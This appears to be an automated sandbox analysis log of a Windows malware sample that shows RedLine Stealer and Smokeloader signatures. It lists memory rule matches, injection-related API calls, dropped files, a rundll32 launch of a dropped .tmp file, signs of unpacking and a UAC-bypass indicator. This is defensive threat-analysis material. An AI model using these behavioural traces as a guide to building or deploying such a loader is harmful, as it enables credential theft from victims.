Source: 0000000C.00000002.568515234.0000000002E8E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.521464355.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.586404126.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.568347439.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.520261780.0000000004997000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.536404249.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.422685888.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.422539917.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.586888838.0000000002C38000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.586363495.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.534093898.0000000002EA9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6.2.F50.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.F50.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.422927170.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000000.407390160.0000000002A41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.422745433.0000000002D51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.587334500.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.568515234.0000000002E8E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.521464355.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.586404126.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.568347439.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.520261780.0000000004997000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.536404249.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.422685888.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.422539917.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.586888838.0000000002C38000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.586363495.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.534093898.0000000002EA9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409466	0_2_00409466
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412670	0_2_00412670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00415482	0_2_00415482
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041212C	0_2_0041212C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E9E6	0_2_0040E9E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00411BE8	0_2_00411BE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D995	0_2_0040D995
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_00409466	4_2_00409466
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_00412670	4_2_00412670
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_00415482	4_2_00415482
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_0041212C	4_2_0041212C
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_0040E9E6	4_2_0040E9E6
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_00411BE8	4_2_00411BE8
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_0040D995	4_2_0040D995
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004D1370	5_2_004D1370
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004E9303	5_2_004E9303
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004E55F9	5_2_004E55F9
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004FA940	5_2_004FA940
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004E8DF6	5_2_004E8DF6

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401615
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040280D NtClose,	0_2_0040280D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401620
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403428 GetModuleHandleA,Sleep,GetModuleFileNameW,ExpandEnvironmentStringsW,lstrcatW,CreateFileW,MapViewOfFile,LocalFree,GetForegroundWindow,NtOpenProcess,NtQueryKey,NtEnumerateKey,strstr,wcsstr,tolower,towlower,	0_2_00403428
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401633 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401633
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401636 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401636
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004026C4 NtClose,	0_2_004026C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004017E4 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004017E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040159D NtAllocateVirtualMemory,	0_2_0040159D
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401615
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_0040280D NtClose,	4_2_0040280D
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401620
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_00403428 GetModuleHandleA,Sleep,GetModuleFileNameW,ExpandEnvironmentStringsW,lstrcatW,CreateFileW,MapViewOfFile,LocalFree,GetForegroundWindow,NtOpenProcess,NtQueryKey,NtEnumerateKey,strstr,wcsstr,tolower,towlower,	4_2_00403428
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_00401633 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401633
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_00401636 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401636
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_004026C4 NtClose,	4_2_004026C4
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_004017E4 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004017E4
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_0040159D NtAllocateVirtualMemory,	4_2_0040159D

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll	Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\Wtfoiq.tmp D0AC0E9021C6E231C60256198309B7F72CE4C5E772CF343B5456C2CE0664B9BD

Source: file.exe	ReversingLabs: Detection: 46%
Source: file.exe	Virustotal: Detection: 52%

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wdscede C:\Users\user\AppData\Roaming\wdscede
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EE5A.exe C:\Users\user\AppData\Local\Temp\EE5A.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F50.exe C:\Users\user\AppData\Local\Temp\F50.exe
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Wtfoiq.tmp",Iyidwoiowsw
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\F50.exe "C:\Users\user\AppData\Local\Temp\F50.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EE5A.exe C:\Users\user\AppData\Local\Temp\EE5A.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F50.exe C:\Users\user\AppData\Local\Temp\F50.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Wtfoiq.tmp",Iyidwoiowsw	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wdscede

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\EE5A.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@9/5@21/9

Source: C:\Users\user\AppData\Local\Temp\EE5A.exe

Code function: 5_2_004BC614 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,

5_2_004BC614

Source: C:\Users\user\AppData\Local\Temp\EE5A.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Wtfoiq.tmp",Iyidwoiowsw

Source: C:\Users\user\AppData\Local\Temp\F50.exe

Mutant created: \Sessions\1\BaseNamedObjects\WTfewgNmxpcaVXHKTu

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: F50.exe, 00000006.00000002.528181766.0000000000410000.00000040.00000001.01000000.00000008.sdmp, F50.exe, 0000000C.00000002.567417661.0000000000410000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: F50.exe, 0000000C.00000002.569153317.0000000002F10000.00000004.00000020.00020000.00000000.sdmp, F50.exe, 0000000C.00000002.648280512.0000000007493000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\donupuvip.pdb source: F50.exe, 00000006.00000000.483025298.0000000000401000.00000020.00000001.01000000.00000008.sdmp, F50.exe, 0000000C.00000000.525499215.0000000000401000.00000020.00000001.01000000.00000008.sdmp, F50.exe.1.dr
Source:	Binary string: C:\donupuvip.pdb source: F50.exe, 00000006.00000000.483025298.0000000000401000.00000020.00000001.01000000.00000008.sdmp, F50.exe, 0000000C.00000000.525499215.0000000000401000.00000020.00000001.01000000.00000008.sdmp, F50.exe.1.dr
Source:	Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: F50.exe, 0000000C.00000002.569572014.0000000004A5F000.00000004.00000800.00020000.00000000.sdmp, F50.exe, 0000000C.00000002.648280512.0000000007493000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: F50.exe, 0000000C.00000002.569153317.0000000002F10000.00000004.00000020.00020000.00000000.sdmp, F50.exe, 0000000C.00000002.648280512.0000000007493000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: F50.exe, 0000000C.00000002.569572014.0000000004A5F000.00000004.00000800.00020000.00000000.sdmp, F50.exe, 0000000C.00000002.648280512.0000000007493000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\nodisexu yavagehinup25\lore6 waciropa\jasat.pdb source: file.exe, wdscede.1.dr
Source:	Binary string: C:\cotuzupax\penoriyupu\bodukik-pom6.pdb source: EE5A.exe, 00000005.00000000.475912939.0000000000401000.00000020.00000001.01000000.00000007.sdmp, EE5A.exe.1.dr
Source:	Binary string: CC:\cotuzupax\penoriyupu\bodukik-pom6.pdb source: EE5A.exe, 00000005.00000000.475912939.0000000000401000.00000020.00000001.01000000.00000007.sdmp, EE5A.exe.1.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Unpacked PE file: 5.2.EE5A.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\F50.exe	Unpacked PE file: 6.2.F50.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\F50.exe	Unpacked PE file: 12.2.F50.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\wdscede	Unpacked PE file: 4.2.wdscede.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Unpacked PE file: 5.2.EE5A.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\F50.exe	Unpacked PE file: 6.2.F50.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\F50.exe	Unpacked PE file: 12.2.F50.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402DB9 push esi; ret	0_2_00402DCF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004091F5 push ecx; ret	0_2_00409208
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C02E20 push esi; ret	0_2_02C02E36
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_00402DB9 push esi; ret	4_2_00402DCF
Source: C:\Users\user\AppData\Roaming\wdscede	Code function: 4_2_004091F5 push ecx; ret	4_2_00409208
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004F81D6 push 004F5947h; ret	5_2_004F82F5
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004F81D6 push 004A7ED8h; ret	5_2_004F87C8
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004EC1B8 push 004B9C1Ah; ret	5_2_004EC306
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004D650F push 004D4937h; ret	5_2_004D666E
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004A8535 push 0049C91Ch; ret	5_2_004A8811
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_0046763A push 0045EEBAh; ret	5_2_0046769C
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004F6755 push 004B66B8h; ret	5_2_004F69D5
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004C8717 push 004A47B2h; ret	5_2_004C8863
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004C8717 push 0049EEB0h; ret	5_2_004C8AB5
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004D688A push 0045F957h; ret	5_2_004D68A8
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004EC8A7 push 004E3B24h; ret	5_2_004ECC5E
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004AB8A4 push 004A93CBh; ret	5_2_004AB9B9
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004A8A07 push 004A1DA9h; ret	5_2_004A8D5B
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004F4B5F push edx; ret	5_2_004F4B85
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_00463CD5 push 0045EEBAh; ret	5_2_00463E70
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004D7D4B push 004D5472h; ret	5_2_004D7E2B
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004F8D9E push 004C1DDDh; ret	5_2_004F8F1A
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004F7E0B push 004DAA89h; ret	5_2_004F7E9A
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004EBFDA push 004C6325h; ret	5_2_004EC1B7
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004A6FF6 push 0049E758h; ret	5_2_004A7053
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004B004D push dword ptr [004FE19Fh]; ret	5_2_004B0058
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004B1047 push 004A2674h; ret	5_2_004B1057
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_00468048 push 00461400h; ret	5_2_00468139
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_0049305B push 0045F504h; ret	5_2_00493567
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004B0059 push dword ptr [004FE1CFh]; ret	5_2_004B0410
